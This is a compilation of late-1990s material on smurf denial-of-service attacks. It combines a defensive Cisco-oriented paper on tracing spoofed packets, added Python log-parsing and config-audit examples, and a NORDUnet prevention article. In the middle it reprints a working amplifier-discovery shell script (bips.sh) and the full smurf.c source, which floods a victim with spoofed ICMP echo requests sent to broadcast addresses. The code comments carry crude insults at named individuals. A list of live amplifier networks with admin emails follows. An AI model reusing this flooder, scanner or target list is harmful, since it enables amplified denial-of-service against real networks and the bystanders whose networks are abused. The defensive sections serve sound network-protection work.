In later 11.1 versions, a new keyword was introduced for ACL logging: "log-input". A formatted ACL line utilizing the keyword looks like this:

    access-list 101 permit icmp any any echo log-input

When applied to an interface, this line will log all ICMP ping packets with input interface and MAC address (for multi-access networks). Point-to-point interfaces will not have a MAC address listed.
Here's an example of the log entry for a multi-access network (FDDI, Ether):

    Sep 10 23:17:01 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 10.0.7.30 (FastEthernet1/0 0060.3e2f.6e41) -> 10.30.248.3 (8/0), 5 packets

Here's an example of the log entry for a point-to-point network:

    Sep 10 23:29:00 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 10.0.7.30 (BRI0 *PPP*) -> 10.0.19.242 (8/0), 1 packet

Substituting "log" for "log-input" will eliminate the incoming interface and MAC address from the log messages.

We'll use the first log entry to demonstrate how to go from here. This log entry means the packet came in on FastEthernet1/0, from MAC address 0060.3e2f.6e41, destined for 10.30.248.3. From here, you can use "show ip arp" (if needed) to determine the IP address for the MAC address, and go to the next hop for tracing or contact the necessary peer (in the case of an exchange point). This is a hop-by-hop tracing method.

Example of "show ip arp" used to find next hop:

    netlab#show ip arp 0060.3e2f.6e41
    Protocol  Address          Age (min)  Hardware Addr   Type   Interface
    Internet  10.0.183.65             32  0060.3e2f.6e41  ARPA   FastEthernet1/0

As you can see, 10.0.183.65 is the next hop where the packets came from and we should go there to continue the tracing process, utilizing the same ACL method. By doing this, you can track the spoof attack backwards.

While this is general information on tracking spoofed packets, it must be noted that the victims of a smurf attack get packets from the listed source in the packets; i.e., they receive echo-reply packets truly from the source listed in the IP header. This information should be used by the bounce sites or intermediaries to track the spoofed echo _request_ packets back to their source (the perpetrator).

MCI's Internet Security team has put together a perl script which, in an automated fashion, can log into your Cisco routers and trace a spoof attack back to its source. The program is available, free of charge.
See http://www.security.mci.net/dostracker/ for more information.

OTHER DENIAL OF SERVICE ATTACKS WORTHY OF MENTION:

Two other denial of service attacks frequently encountered are TCP SYN floods, and UDP floods aimed at diagnostic ports on hosts.

TCP SYN attacks consist of a large number of spoofed TCP connection set-up messages aimed at a particular service on a host. Older TCP implementations cannot handle many faked connection set-up packets, and will not allow access to the victim service.

The most common form of UDP flooding directed at harming networks is an attack consisting of a large number of spoofed UDP packets aimed at diagnostic ports on network devices. This attack is also known as the "pepsi" attack (again named after the exploit program), and can cause network devices to use up a large amount of CPU time responding to these packets.

To get more information on minimizing the effects of these two attacks, see:

    Defining Strategies to Protect Against TCP SYN Denial of Service Attacks
    http://cio.cisco.com/warp/public/707/4.html

    Defining Strategies to Protect Against UDP Diagnostic Port DoS Attacks
    http://cio.cisco.com/warp/public/707/3.html

PERFORMANCE INFORMATION:

One ISP has reported that, spread across three routers (2 RSP2 and 1 RSP4), the fast drop code eliminated a sustained 120 Mbits/sec smurf attack and kept the network running without performance problems. As always, your mileage may vary.

ACKNOWLEDGEMENTS:

Thanks to all those who helped review and provide input to the paper, as well as sanity checking. Specific thanks to:

* Ravi Chandra of Cisco Systems for information on the bugfixes.
* Daniel Senie of Daniel Senie Consulting, Jon Green of Bay Networks for information on other vendors' equipment.
* Paul Ferguson of Cisco Systems, Kelly Cooper of GTE/BBN, Rob McMillan of CERT for sanity-check and review comments.

Referenced documents:

This section is coming soon.
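
The hop-by-hop step from the TRACING SPOOFED PACKET STREAMS section above, as an added example that is not part of Huegen's paper or of MCI's dostracker script: it parses "log-input" entries, totals echo-request packets per input interface and upstream MAC address, and names the next lookup. The sample log mixes the two entries quoted above with constructed ones; the function names and the layout of a plain "log" entry (no parenthesised interface field) are assumptions.

```python
import re
from collections import Counter

# Constructed sample: the first and fourth entries are the two quoted in the
# paper; the others (including MAC 0000.0c12.3456) are made up for this example.
SAMPLE_LOG = """\
Sep 10 23:17:01 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 10.0.7.30 (FastEthernet1/0 0060.3e2f.6e41) -> 10.30.248.3 (8/0), 5 packets
Sep 10 23:17:06 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 10.0.7.30 (FastEthernet1/0 0060.3e2f.6e41) -> 10.30.248.3 (8/0), 212 packets
Sep 10 23:17:09 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 10.0.9.14 (FastEthernet1/0 0000.0c12.3456) -> 10.30.248.3 (8/0), 1 packet
Sep 10 23:29:00 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 10.0.7.30 (BRI0 *PPP*) -> 10.0.19.242 (8/0), 1 packet
Sep 10 23:29:05 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 10.0.19.242 (FastEthernet1/0 0060.3e2f.6e41) -> 10.0.7.30 (0/0), 40 packets
Sep 10 23:30:00 PDT: %LINK-3-UPDOWN: Interface BRI0, changed state to up
"""

# The "(interface layer-2-info)" group only appears with "log-input"; treating
# it as simply absent under plain "log" is an assumption of this example.
ENTRY_RE = re.compile(
    r"%SEC-6-IPACCESSLOGDP: list (?P<acl>\S+) (?P<action>permitted|denied) "
    r"(?P<proto>\S+) (?P<src>\d+(?:\.\d+){3})"
    r"(?: \((?P<ifname>[^\s)]+)(?: (?P<l2>[^)]+))?\))?"
    r" -> (?P<dst>\d+(?:\.\d+){3}) \((?P<type>\d+)/(?P<code>\d+)\), "
    r"(?P<count>\d+) packets?"
)
MAC_RE = re.compile(r"^[0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4}$", re.I)


def parse_entry(line):
    """Return the fields of one ACL log entry, or None for unrelated lines."""
    m = ENTRY_RE.search(line)
    if m is None:
        return None
    entry = m.groupdict()
    l2 = entry.pop("l2")
    # Point-to-point links log a marker such as *PPP* instead of a MAC address.
    entry["mac"] = l2.lower() if l2 and MAC_RE.match(l2) else None
    for key in ("type", "code", "count"):
        entry[key] = int(entry[key])
    return entry


def rank_upstreams(lines, dst=None, icmp_type=8):
    """Total packets per (input interface, upstream MAC), heaviest first.

    icmp_type=8 selects echo requests, which is what a bounce site traces;
    dst optionally narrows the count to one destination address.
    """
    totals = Counter()
    for line in lines:
        entry = parse_entry(line)
        if entry is None or entry["proto"] != "icmp" or entry["type"] != icmp_type:
            continue
        if dst is not None and entry["dst"] != dst:
            continue
        if entry["ifname"] is None:
            continue  # plain "log" entry: no interface to trace through
        totals[(entry["ifname"], entry["mac"])] += entry["count"]
    return sorted(totals.items(),
                  key=lambda kv: (-kv[1], kv[0][0], kv[0][1] or ""))


def next_step(upstream):
    """Name the next lookup for one (interface, MAC) pair."""
    ifname, mac = upstream
    if mac:
        return f"show ip arp {mac}"
    return f"no MAC on {ifname}: continue on the router at the far end of that link"


if __name__ == "__main__":
    ranked = rank_upstreams(SAMPLE_LOG.splitlines(), dst="10.30.248.3")
    for upstream, packets in ranked:
        print(f"{packets:6d} packets via {upstream[0]}: {next_step(upstream)}")
```

Because each log entry carries a packet count, ranking by the summed counts rather than by the number of entries keeps a rate-limited log from hiding the busiest upstream neighbor.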
=)

PERMISSION TO DUPLICATE:

Permission to duplicate this information is granted under these terms:

1. My name and e-mail address remains on the information as a target for questions and identification of the source
2. My disclaimer appears on the information at the bottom
3. Feel free to add extra information from other discussions, etc., but please ensure the correct attribution is made to the author. Also provide Craig Huegen (chuegen@quadrunner.com) a copy of your additions.
4. Please help disseminate this information to other network administrators who are affected by these attacks.

If you have questions, I will be happy to answer them to the best of my knowledge.

MY DISCLAIMER:

I'm speaking about this as an interested party only. All text in this paper was written by me; I speak/write for no one but myself. No vendors have officially confirmed/denied any of the information contained herein. All research for this paper is being done purely as a matter of self-interest and desire to help others minimize effects of this attack.

Craig A. Huegen
chuegen@quadrunner.com
http://www.quadrunner.com/~chuegen/smurf.txt

----------------------------------------------------------------------------

T. Freak's posted his smurf code, and there's been a few messages concerning this d.o.s. attack -- I guess now is as good a time as any to release this little script. I'm sure there's a more efficient way of putting something like this together, but... oh well.

Results of the scan are reported into ./bips.results

note: this script has two parts.

--- bips.sh ---
#!/bin/bash # find broadcast ip's that reply with 30+ dupes. # i decided to make this script into two sections. when running this make # sure both parts are in the same directory. if [ $# != 1 ]; then echo "$0 " else host -l $1 | grep 'has address' | cut -d' ' -f4 > $1.ips cat $1.ips | cut -d'.' 
-f1-3 | sort |\ awk '{ print echo ""$1".255" }' > $1.tmp cat $1.tmp | uniq | awk '{ print "./chekdup.sh "$1"" }' > $1.ping rm -f $1.ips $1.tmp chmod 700 $1.ping ./$1.ping rm $1.ping fi --- chekdup.sh --- #!/bin/bash # this checks possible broadcast ip's for a given amount of icmp echo # replies. ping -c 2 $1 > $1.out if cat $1.out | grep dupl > /dev/null then export DUPES="`cat $1.out | grep dupl | cut -d'+' -f2 | cut -d' ' -f1`" else export DUPES=1 fi if [ $DUPES -gt 30 ]; then echo "$1 had $DUPES dupes" >> bips.results rm -f $1.out else rm -f $1.out fi ------------------------------------------------------------------------------ Here is Tfreaks code ported to FreeBSD and whatever other operating systems use BSD style sockets. ---- smurf.c ---- /* * $Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $ * * spoofs icmp packets from a host to various broadcast addresses resulting in * multiple replies to that host from a single packet. * * orginial linux code by tfreak, most props to him, all I did was port it to * operating systems with a less perverse networking system, such as FreeBSD, * and many others. -Griffin * * mad head to: nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea * pig, MissSatan for swallowing, napster for pimping my sister, the guy that * invented vaseline, fyber for trying, knowy, old school #havok, kain cos he * rox my sox, zuez, toxik, robocod, and everyone else that i might have * missed (you know who you are). * * hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy thing * he is (he's -almost- as stubborn as me, still i managed to pick up half * the cheque). * * and a special hi to Todd, face it dude, you're fucking awesome. 
* * mad anal to: #madcrew/#conflict for not cashing in their cluepons, EFnet * IRCOps because they plain suck, Rolex for being a twit, everyone that * trades warez, Caren for being a lesbian hoe, AcidKill for being her * partner, #cha0s, sedriss for having an ego in inverse proportion to his * penis and anyone that can't pee standing up -- you don't know what your * missing out on. * * and anyone thats ripped my code (diff smurf.c axcast.c is rather * interesting). * * and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill Robbins * for trying to steal my girlfriend. Not only did you show me no respect * but you're a manipulating prick who tried to take away the most important * thing in the world to me with no guilt whatsoever, and for that I wish you * nothing but pain. Die. * * disclaimer: I cannot and will not be held responsible nor legally bound for * the malicious activities of individuals who come into possession of this * program and I refuse to provide help or support of any kind and do NOT * condone use of this program to deny service to anyone or any machine. This * is for educational use only. Please Don't abuse this. * * Well, i really, really, hate this code, but yet here I am creating another * disgusting version of it. Odd, indeed. So why did I write it? Well, I, * like most programmers don't like seeing bugs in their code. I saw a few * things that should have been done better or needed fixing so I fixed them. * -shrug-, programming for me as always seemed to take the pain away ... 
* * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include void banner(void); void usage(char *); void smurf(int, struct sockaddr_in, u_long, int); void ctrlc(int); unsigned int host2ip(char *hostname); unsigned short in_chksum(u_short *, int); unsigned int host2ip(char *hostname) { static struct in_addr i; struct hostent *h; i.s_addr = inet_addr(hostname); if (i.s_addr == -1) { h = gethostbyname(hostname); if (h == NULL) { fprintf(stderr, "can't find %s\n.", hostname); exit(0); } bcopy(h->h_addr, (char *) &i.s_addr, h->h_length); } return i.s_addr; } /* stamp */ char id[] = "$Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $"; int main(int argc, char *argv[]) { struct sockaddr_in sin; FILE *bcastfile; int i, sock, bcast, delay, num, pktsize, cycle = 0, x; char buf[32], **bcastaddr = malloc(8192); banner(); signal(SIGINT, ctrlc); if (argc < 6) usage(argv[0]); sin.sin_addr.s_addr = host2ip(argv[1]); sin.sin_family = AF_INET; num = atoi(argv[3]); delay = atoi(argv[4]); pktsize = atoi(argv[5]); if ((bcastfile = fopen(argv[2], "r")) == NULL) { perror("opening bcast file"); exit(-1); } x = 0; while (!feof(bcastfile)) { fgets(buf, 32, bcastfile); if (buf[0] == '#' || buf[0] == '\n' || !isdigit(buf[0])) continue; for (i = 0; i < strlen(buf); i++) if (buf[i] == '\n') buf[i] = '\0'; bcastaddr[x] = malloc(32); strcpy(bcastaddr[x], buf); x++; } bcastaddr[x] = 0x0; fclose(bcastfile); if (x == 0) { fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]); exit(-1); } if (pktsize > 1024) { fprintf(stderr, "ERROR: packet size must be < 1024\n\n"); exit(-1); } if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("getting socket"); exit(-1); } setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *) &bcast, sizeof(bcast)); printf("Flooding %s (. 
= 25 outgoing packets)\n", argv[1]); for (i = 0; i < num || !num; i++) { if (!(i % 25)) { printf("."); fflush(stdout); } smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize); cycle++; if (bcastaddr[cycle] == 0x0) cycle = 0; usleep(delay); } puts("\n\n"); return 0; } void banner(void) { puts("\nsmurf.c v5.0 by TFreak, ported by Griffin\n"); } void usage(char *prog) { fprintf(stderr, "usage: %s " " \n\n" "target = address to hit\n" "bcast file = file to read broadcast addresses from\n" "num packets = number of packets to send (0 = flood)\n" "packet delay = wait between each packet (in ms)\n" "packet size = size of packet (< 1024)\n\n", prog); exit(-1); } void smurf(int sock, struct sockaddr_in sin, u_long dest, int psize) { struct ip *ip; struct icmp *icmp; char *packet; int hincl = 1; packet = malloc(sizeof(struct ip) + sizeof(struct icmp) + psize); ip = (struct ip *) packet; icmp = (struct icmp *) (packet + sizeof(struct ip)); memset(packet, 0, sizeof(struct ip) + sizeof(struct icmp) + psize); setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &hincl, sizeof(hincl)); ip->ip_len = sizeof(struct ip) + sizeof(struct icmp) + psize; ip->ip_hl = sizeof *ip >> 2; ip->ip_v = 4; ip->ip_ttl = 255; ip->ip_tos = 0; ip->ip_off = 0; ip->ip_id = htons(getpid()); ip->ip_p = 1; ip->ip_src.s_addr = sin.sin_addr.s_addr; ip->ip_dst.s_addr = dest; ip->ip_sum = 0; icmp->icmp_type = 8; icmp->icmp_code = 0; icmp->icmp_cksum = htons(~(ICMP_ECHO << 8)); sendto(sock, packet, sizeof(struct ip) + sizeof(struct icmp) + psize, 0, (struct sockaddr *) & sin, sizeof(struct sockaddr)); free(packet); /* free willy! 
*/ } void ctrlc(int ignored) { puts("\nDone!\n"); exit(1); } unsigned short in_chksum(u_short * addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) addr; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); }
--- end ---

Preventing Smurf Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.nordu.net/articles/smurf.html

Introduction

This brief introduction to the denial-of-service attacks of the SMURF type (named after the program used to instigate the attack) explains what they are and what can be done about them. In a SMURF attack you can be affected in one of several ways:

* As a victim or target of the attack
* As a network which is abused to amplify the attack
* As a party harboring the instigator of the attack

SMURF and similar Denial-of-service (DoS) attacks can do serious damage to your network services, be it either as an individual end-user or as an entire institution in that your network or host can be inundated with unwanted and maliciously sent traffic.

Anatomy of a SMURF Attack

A SMURF attack (named after the program used to perform the attack) is a method by which an attacker can send a moderate amount of traffic and cause a virtual explosion of traffic at the intended target. The method used is as follows:

* The attacker sends ICMP Echo Request packets where the source IP address has been forged to be that of the target of the attack.
* The attacker sends these ICMP datagrams to the broadcast addresses of remote LANs, using so-called directed broadcast addresses. These datagrams are thus broadcast out on the LANs by the connected router.
* All the hosts which are «alive» on the LAN each pick up a copy of the ICMP Echo Request datagram (as they should), and send an ICMP Echo Reply datagram back to what they think is the source.
* If many hosts are «alive» on the LAN, the amplification factor can be considerable (100+ is not uncommon).
* The attacker can use largish packets (typically up to ethernet maximum) to increase the «effectiveness» of the attack, and the faster network connection the attacker has, the more damage he can inflict on the target and the target's network.

Not only can the attacker cause problems for the target host, the influx of traffic can in fact be so great as to have a seriously negative effect on the upstream network(s) from the target. In fact, those institutions being abused as amplifier networks can also be similarly affected, in that their network connection can be swamped by the Echo Reply packets destined for the target.

Preventing SMURF attacks

PROPERLY CONFIGURED NETWORK EQUIPMENT IS THE KEY

The availability of the directed broadcast function is an important element in these attacks. The current Proposed Standard for "Requirements for IP Version 4 Routers" (RFC1812) states that a router must default to forwarding directed broadcasts, that a knob must exist to turn it off, but it must default to the «on» position (see section 5.3.5.2 of RFC1812). However, the current sentiment is that this should no longer be a requirement.

Thus, to prevent your network from being abused as an amplifier network in a SMURF attack, you should turn off the forwarding of directed broadcast on all router ports or take other measures to assure your network cannot be abused in this manner.

Another component which is important in this type of attack is that the attacker has to be able to inject packets into the network with forged IP source addresses. It is possible to enable functions in routers which will prevent the trivial forgery of IP source addresses, and doing so for a local network will prevent SMURF attacks from being launched locally. (Do however note that access lists can have a performance impact, so judicious use of such tools is advised.) This sort of ingress filtering has been documented in RFC2267, and is effective not only for preventing local origination of SMURF attacks, but also makes tracking attacks (or denying origination of attacks) much easier.

Since SMURF attacks use forged source addresses, tracking SMURF attacks back to their source can be a challenge. It has to be done while the attack is ongoing, and requires the swift cooperation of all the network service providers along the path. In practice this has proven to be quite difficult. Instead, what we have done in NORDUnet is to set a rate-limit on the volume of ICMP Echo Reply traffic we allow into NORDUnet. This is so that we can «soften» the effect of an attack originated outside of NORDUnet directed at a host inside NORDUnet.

For more detailed instructions as to how to take precautionary measures see Craig A. Huegen's page describing SMURF attacks.

There is also an informal SMURF Amplifier Registry housed by the Norwegian ISP PowerTech, which in the form of a «hall of shame» lists active amplifier networks. It might be a good idea to check that your network is not on this list.
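
One way to check a router configuration for the directed-broadcast setting that both articles recommend, as an added example (not code from NORDUnet, Huegen or Cisco). It assumes IOS-style configuration text from the 11.x releases discussed above, where forwarding stays on unless "no ip directed-broadcast" appears under the interface; the sample configuration, the function names and the point-to-point prefix list are constructed for illustration.

```python
import ipaddress

# Constructed sample configuration (documentation and private address ranges).
SAMPLE_CONFIG = """\
hostname netlab
!
interface FastEthernet0/0
 description server LAN
 ip address 192.0.2.1 255.255.255.0
!
interface FastEthernet0/1
 ip address 198.51.100.1 255.255.255.128
 no ip directed-broadcast
!
interface Fddi3/0
 ip address 10.30.248.1 255.255.254.0
!
interface Serial1/0
 ip address 203.0.113.1 255.255.255.252
!
interface Ethernet2
 no ip address
 shutdown
!
"""

# Interface types Huegen's paper treats as point-to-point (at most two replies,
# so the command has little effect). This prefix list is an assumption of the
# example, not an exhaustive list of IOS interface types.
POINT_TO_POINT = ("serial", "pos", "hssi", "bri")


def interface_stanzas(config_text):
    """Yield (header_words, sub_commands) for every 'interface' stanza."""
    header, body = None, []
    for raw in config_text.splitlines():
        if raw.startswith("interface "):
            if header:
                yield header, body
            header, body = raw.split()[1:], []
        elif header and raw.startswith(" "):
            body.append(raw.strip())
        elif header:  # "!" or any unindented line closes the stanza
            yield header, body
            header, body = None, []
    if header:
        yield header, body


def audit(config_text):
    """List multi-access interfaces that would still forward directed broadcasts.

    Each finding is (interface, directed broadcast address, usable host
    addresses); the host count is the upper bound on replies per request.
    """
    findings = []
    for header, body in interface_stanzas(config_text):
        name = header[0]
        if "shutdown" in body or "no ip directed-broadcast" in body:
            continue
        if name.lower().startswith(POINT_TO_POINT) or "point-to-point" in header:
            continue
        for command in body:
            words = command.split()
            # Only "ip address <addr> <mask> [secondary]" defines a subnet;
            # "no ip address" and "ip address negotiated" are skipped.
            if words[:2] != ["ip", "address"] or len(words) < 4:
                continue
            try:
                network = ipaddress.ip_interface(f"{words[2]}/{words[3]}").network
            except ValueError:
                continue
            if network.prefixlen >= 31:
                continue  # no broadcast address worth amplifying
            findings.append((name, str(network.broadcast_address),
                             network.num_addresses - 2))
    return sorted(findings, key=lambda finding: -finding[2])


if __name__ == "__main__":
    for name, broadcast, hosts in audit(SAMPLE_CONFIG):
        print(f"{name}: add 'no ip directed-broadcast' "
              f"(broadcast {broadcast}, up to {hosts} replying hosts)")
```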
http://netscan.org/lamers-r-us.html - Lists the current 2048 top smurf amplifiers, sample list below

And the following information:

Current top ten smurf amplifiers (updated every 5 minutes) (last update: 1999-08-04 20:31:03 CET)

110536 networks have been probed with the SAR
19684 of them are currently broken
13338 have been fixed after being listed here

comes from a Norwegian site, http://www.powertech.no/smurf/

Smurf Amplifier List (Is your network on this list??)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://netscan.org/lamers-r-us.html

Note that it's also possible to see the # of replies for any network. Head to the main page and punch in an IP.
Last rescan: Wed Jul 14 20:00:57 EDT 1999
208.236.180.0 martyr@acr.org 41 208.192.231.0 noc@interactive.net 40 143.43.204.0 D-Romano@wiu.edu 40 143.43.205.255 D-Romano@wiu.edu 40 192.239.137.0 pete@rayleigh.tt.aftac.gov 40 192.239.137.255 pete@rayleigh.tt.aftac.gov 40 194.167.120.0 yves.prague@u-bordeaux2.fr 40 195.18.119.0 marcel@nl.gxn.net, stefan@nl.gxn.net, hans@nl.gxn.net 40 195.18.119.255 marcel@nl.gxn.net, stefan@nl.gxn.net, hans@nl.gxn.net 40 199.108.184.0 dns@cerf.net 40 200.20.94.0 gomide@nic.br 40 204.84.30.0 hostmaster@ncren.net 40 204.84.31.255 hostmaster@ncren.net 40 205.213.128.255 frcr@ltc.tec.wi.us 40 205.213.133.255 frcr@ltc.tec.wi.us 40 206.148.251.0 noc@mwci.net 40 206.148.251.255 noc@mwci.net 40 206.157.67.255 abettsak@sinfo.net 40 206.157.68.0 abettsak@sinfo.net 40 209.64.2.255 info@netradio.net 40 206.27.80.0 abettsak@sinfo.net 40 208.140.202.255 admin@sinfo.net 40 209.137.126.0 hostmaster@icix.net 40 207.49.79.0 abettsak@sinfo.net 39 148.83.4.0 39 194.8.193.0 mruesel@netcologne.de, akb@netcologne.de, jsommerberg@netcologne.de 39 195.145.123.255 lick@ron.de 39 200.17.53.0 gomide@nic.br 39 203.139.106.255 hostmaster@nic.ad.jp 39 203.179.212.255 hostmaster@nic.ad.jp 39 204.179.253.0 dpinder@appliedcom.com 39 204.179.253.255 dpinder@appliedcom.com 39 204.84.29.0 hostmaster@ncren.net 39 204.88.64.0 39 204.97.19.255 hostmaster@top.monad.net 39 205.221.193.0 rparis@ihcc.cc.ia.us 39 206.157.64.0 abettsak@sinfo.net 39 209.133.61.255 noc@above.net 39 208.237.105.0 rwilhe@luk-us.com 39 208.152.187.0 stokes@aris.net 39 208.152.187.255 stokes@aris.net 39 208.3.167.255 nomailbox@nowhere 39 208.201.184.0 nomailbox@nowhere 38 63.64.107.0 jshelnutt@ispalliance.net 38 63.64.107.255 jshelnutt@ispalliance.net 38 192.239.136.0 pete@rayleigh.tt.aftac.gov 38 192.239.136.255 pete@rayleigh.tt.aftac.gov 38 193.128.20.0 38 193.128.21.0 38 193.128.21.255 38 193.6.21.255 net-admin@sztaki.hu, dns-admin@hungarnet.hu 38 198.64.21.255 hostmaster@sesqui.net 38 198.64.22.0 hostmaster@sesqui.net 38 199.244.182.0 38 
200.16.176.0 nomailbox@nowhere 38 202.251.136.0 hostmaster@nic.ad.jp 38 204.116.225.0 38 204.116.225.255 38 204.116.226.0 38 204.116.226.255 38 204.116.33.0 richard.colgate@sunbelt.net 38 204.116.33.255 richard.colgate@sunbelt.net 38 206.126.151.255 pete@altadena.net 38 208.218.96.0 mitch@gvtc.com 38 208.218.97.0 mitch@gvtc.com 38 208.218.96.255 mitch@gvtc.com 38 207.177.41.0 noc@netins.net 38 207.177.41.255 noc@netins.net 38 209.85.102.0 hostmaster@softaware.com 38 209.85.103.255 jweis@softaware.com 38 207.67.228.255 Dave@pacificcolor.com 38 207.196.111.0 hostmaster@clark.net 38 207.224.201.0 dlongar@uswest.net 38 209.64.2.0 info@netradio.net 38 206.206.103.255 Beeson@technet.nm.org 38 209.175.161.255 wdahlen@mail.isbe.state.il.us 38 206.176.39.0 sbrost@mystic.bhsu.edu 38 206.176.39.255 sbrost@mystic.bhsu.edu 38 206.191.216.255 nomailbox@nowhere 37 193.128.20.255 37 193.188.61.255 kha@knpc.com.kw, hmb@knpc.com.kw 37 195.20.88.0 103023.2047@compuserve.com, hostmaster@OMNILINK.NET 37 195.20.88.255 hostmaster@omnilink.net, 103023.2047@compuserve.com 37 195.38.102.255 thomas@tvnet.hu, adi@tvnet.hu 37 199.244.182.255 37 203.238.129.255 mgr@nownuri.net, ip@nownuri.net 37 204.254.80.255 keith@dcna.com 37 204.48.142.255 tuma@ceo.sbceo.k12.ca.us 37 204.48.223.0 tuma@ceo.sbceo.k12.ca.us 37 204.69.110.255 wong@accesscom.net 37 205.223.148.255 dale@roadrunner.admin.leon.k12.fl.us 37 207.123.253.255 mullauer@umms-itg.ab.umd.edu 37 207.67.228.0 Dave@pacificcolor.com 37 206.191.225.0 hostmaster@spacestar.net 37 216.101.17.0 cpuccetti@advmedicine.com 37 207.214.141.255 kgibbs@porterville.k12.ca.us 37 209.163.146.0 37 206.206.103.0 Beeson@technet.nm.org 37 208.237.105.255 rwilhe@luk-us.com 37 210.84.0.0 net-ops@list.ozemail.com.au 37 209.3.41.0 noc@iconnet.net 37 209.201.116.0 support@iconnet.net 37 209.3.40.255 noc@iconnet.net 37 209.201.116.255 support@iconnet.net 37 209.201.119.255 support@iconnet.net 37 216.168.235.0 cwei@netsol.com 37 216.168.235.255 cwei@netsol.com 37 
209.144.168.255 ggillespie@currents.net 37 216.12.37.255 dns@cfw.com 37 209.149.248.0 ipadmin@bellsouth.net 37 209.240.85.0 mury@goldengate.net 37 209.240.85.255 mury@goldengate.net 37 208.2.250.255 nomailbox@nowhere 36 193.0.84.0 Marcin.Gromisz@fuw.edu.pl, Michal.Jankowski@fuw.edu.pl 36 194.68.198.0 36 199.105.221.0 dns@cerf.net 36 199.178.74.0 hostmaster@ameritech.net 36 202.99.41.0 36 202.99.48.0 36 202.99.48.255 36 204.181.85.255 jbuchle@staktek.com 36 204.211.80.0 hostmaster@sips.state.nc.us 36 204.228.78.255 cgarner@sni.net 36 204.69.110.0 wong@accesscom.net 36 205.138.50.0 ipswip@cw.net 36 205.138.50.255 ipswip@cw.net 36 205.213.134.255 frcr@ltc.tec.wi.us 36 205.213.135.255 frcr@ltc.tec.wi.us 36 205.253.192.0 karl@mcs.com 36 205.253.192.255 karl@mcs.com 36 212.48.2.255 carlo.gualandri@matrix.it, melli@matrix.it 36 207.13.165.255 NOC@sprint.net 36 207.214.141.0 kgibbs@porterville.k12.ca.us 36 210.208.167.0 tonyyuan@mail.my.net.tw 36 216.88.175.0 scotts@blairlake.com 36 210.208.167.255 tonyyuan@mail.my.net.tw 36 210.78.152.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.153.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.158.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.152.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.153.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.154.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.155.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 210.78.158.255 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 36 216.94.82.255 nhermes@adexpress.ca 36 207.66.244.0 pat@wolfe.net 36 209.201.118.0 support@iconnet.net 36 209.201.118.255 support@iconnet.net 36 207.13.164.255 NOC@sprint.net 36 209.149.248.255 ipadmin@bellsouth.net 36 209.152.141.255 domain@slip.net 35 192.160.217.255 
greenup@whittier.edu 35 192.174.35.0 35 192.204.204.0 jacobs@mail.dp.upenn.edu 35 192.204.204.255 jacobs@mail.dp.upenn.edu 35 194.57.84.0 Patrice.Koch@univ-fcomte.fr 35 195.90.31.255 guardian@isb.net, nerge@isb.net 35 199.186.145.255 hostmaster@attmail.com 35 200.17.53.255 gomide@nic.br 35 200.25.18.0 lcgomez@b-manga.cetcol.net.co 35 204.0.135.255 hostmaster@sesqui.net 35 204.254.150.0 postmaster@arn.net 35 204.254.150.255 postmaster@arn.net 35 204.48.142.0 tuma@ceo.sbceo.k12.ca.us 35 204.48.223.255 tuma@ceo.sbceo.k12.ca.us 35 205.164.166.0 mjg@writeme.com 35 205.213.128.0 frcr@ltc.tec.wi.us 35 205.213.132.0 frcr@ltc.tec.wi.us 35 205.213.135.0 frcr@ltc.tec.wi.us 35 206.0.199.255 hostinfo@psi.com 35 207.163.229.255 hostmaster@alameda-coe.k12.ca.us 35 207.13.164.0 NOC@sprint.net 35 207.214.142.255 kgibbs@porterville.k12.ca.us 35 207.123.250.255 mullauer@umms-itg.ab.umd.edu 35 207.25.98.0 noc@ans.net 35 207.10.165.0 rcm@mmc.marymt.edu 35 210.208.166.0 tonyyuan@mail.my.net.tw 35 207.10.165.255 rcm@mmc.marymt.edu 35 210.78.154.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 35 210.78.155.0 hlqian@ns.cnc.ac.cn, mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 35 210.78.159.0 hlqian@ns.cnc.ac.cn, 